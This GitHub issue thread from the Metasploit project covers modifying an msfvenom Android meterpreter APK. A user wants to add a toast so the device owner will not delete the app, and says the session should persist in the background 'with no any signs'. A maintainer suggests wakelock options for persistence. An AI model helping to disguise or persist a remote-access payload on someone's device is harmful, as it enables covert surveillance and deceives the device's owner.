### ISSUE TITLE
injecting manually toast code to apk payload where mainactivity.smali crushes 

### ISSUE THREAD

**Issue by eitanhindi** [rapid7/metasploit-framework#9824]
my goal:
to use the msfvenom apk when installed on device and launching to show simple toast.
what i do:
- created msfvenom apk
- decomile the apk
- mainactivity.smali -> where oncreate -> after locals -> adding the following code:
const/4 v0, 0x1

    const-string v1, "MY MESSAGE HERE"

    invoke-static {p0, v1, v0}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;

    move-result-object v0

    invoke-virtual {v0}, Landroid/widget/Toast;->show()V
- recompile the apk.
- sign the apk
- running on my android device -> "MAINACTIVITY STOPPED"

* im working a lot with msfvenom, no frameworks error, all working perfectly
* ive read a little about smali code, and in the code above there is no problem, unless need to add to the mainactivity.smali "import.android.widget.toast" by smali. also i saw in manifest there are no layouts also theme/NoDisplay which might conflict the toast action...?

if it possible, what is the correct way to add simple toast to msfvenom apk to display when i click the app in my device?
thank u.

**Comment by timwr** [comment]
Why don't you build a normal Android app that displays what you want and then inject meterpreter into it with msfvenom?

**Comment by eitanhindi** [comment]
because when im running persistence, lets say for every 15 sec, the app will launch the layout of the main activity every 15 sec, and with msfvenom apk i can run persistence and nothing will be run due to the persistence.
also, with normal app, if i close the app the meterpreter session died...
need to make sure it will be running in the background with no any signs.
so i found the best way is to use the basic of msfvenom apk, but need to add some toast that will not cause the user to delete the app due to none activities.

i tested msfvenom apk with multiple of ways, and get to conclusion that the best way to keep meterpreter session is with basic msfvenom apk

**Comment by timwr** [comment]
Android actively prevents apps from running in the background. You can use the AndroidWakelock=true option or `meterpreter> wakelock` to keep the session active, which will give you more reliable persistence than launching the activity every 15 seconds.
If you want modify the UI it's all here: https://github.com/rapid7/metasploit-payloads/tree/master/java/androidpayload/app
